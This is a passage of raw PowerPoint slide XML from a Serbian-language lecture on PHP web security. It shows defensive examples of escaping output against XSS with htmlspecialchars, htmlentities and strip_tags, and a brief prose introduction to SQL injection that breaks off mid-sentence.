              <a:t>navedene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tagove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odgovarajuće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>entitete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0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62AAAC-6794-41F0-9AAC-0478B42CE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693" y="4267200"/>
            <a:ext cx="8543925" cy="1524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lang="fr-F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php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-F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fr-F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komentar</a:t>
            </a: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fr-F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htmlspecialchars</a:t>
            </a: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("&lt;a href='test'&gt;Test&lt;/a&gt;", ENT_QUOTES);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-F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echo</a:t>
            </a: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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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komentar</a:t>
            </a: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; // &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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lt;a</a:t>
            </a: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href=&amp;#039;test&amp;#039;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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gt;Test&amp;lt</a:t>
            </a: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;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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a&amp;gt</a:t>
            </a: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>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef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23038267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722A2-216E-4CC7-80F7-6A1A54F6E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HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>entiteti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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141DB-01B8-486F-85CD-8D3A99C85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066800"/>
            <a:ext cx="7194550" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Zaštita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>našu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>skriptu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ispis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>komentara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>bila</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200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Druga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1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htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>konvertuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>specijalne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karaktere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svoje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>entitete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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što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©, », €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druge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Drugi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>način</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sprečavanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> XSS-a je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izbacivanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tagova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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 err="1"/>
              <a:t>komentara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" b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039539-246F-44C1-B866-DBD5A29F0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13" y="1524000"/>
            <a:ext cx="8543925" cy="293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php</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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konvertovanje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outputa</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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ime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htmlspecialchars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ime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komentar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htmlspecialchars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komentar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echo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"&lt;p&gt;$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ime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je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napisao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:&lt;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/&gt;";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echo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komentar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."&lt;/p&gt;";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23507179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35FC3-B3C1-4DD8-A75D-F083B670A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Izbacivanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>tagova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67CF6-51AC-4C87-AE4A-9DEA7816B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995363"/>
            <a:ext cx="7194550" cy="514667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/>
              <a:t>Za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>potrebna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrlo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednostavna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1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strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednostavno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>briše</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tagove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ostavlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>čist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tekst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r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dirty="0"/>
              <a:t>U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>slučaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>svi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tagovi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izbačeni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biće</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ispisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>samo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sledeći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tekst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a: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dirty="0"/>
              <a:t> </a:t>
            </a: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u="sng" dirty="0" err="1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strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>još</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogućnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, a to je da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izostavi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tagove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>želimo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izbacimo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. Na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ukoliko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>želimo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>omogućimo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnicima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koriste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>jednostvno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>formatiranje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>teksta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>,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primjer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>: bold, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>em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sl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>možemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koristiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0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D7CB24-002F-43CA-B80D-2E0DC71BB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1" y="2112818"/>
            <a:ext cx="8839200" cy="11083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lang="fr-FR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php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fr-FR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komentar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= '&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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Tekst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u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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paragrafu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.&lt;/p&gt;&lt;!-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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Komentar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--&gt; &lt;a href="# "&gt; Link&lt;/a&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR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echo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FR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strip_tags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fr-FR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komentar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>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef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64D99E-2F84-414A-90B8-A3540634F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1" y="3962400"/>
            <a:ext cx="8839200" cy="376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fr-F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Tekst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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paragrafu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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. Link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34D74B0-006E-40FB-BE30-686233943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132513"/>
            <a:ext cx="8839200" cy="376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fr-F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strip_tags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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fr-F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komentar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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'&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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strong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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&gt;&lt;u&gt;');</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36998241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66258-AD16-4D31-837A-4861F1DBF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Injection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B88CA-AF0E-43A2-B845-81069517C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219200"/>
            <a:ext cx="7194550" cy="49228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Dok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>predstavlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>indirektan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napad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korisnike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>predstavlja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>direktan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napad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PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>aplikaciju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno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bazu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Cilj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ovog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>napada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je da se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izmijeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>određeni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izršile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>razne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>akcije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dobijanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>alterantivnih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, do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izmjene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>brisanja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 err="1"/>
              <a:t>baze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Napad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> SQL Injection-om se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>uglavnom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>vrši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skripte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>provjeru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>autentifikacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisnika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>odnosno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>prilikom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>provere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>korisničkog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>imena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lozinke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/>
              <a:t>Na </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>taj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>način</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>upit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> bi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izmijenio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uvijek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
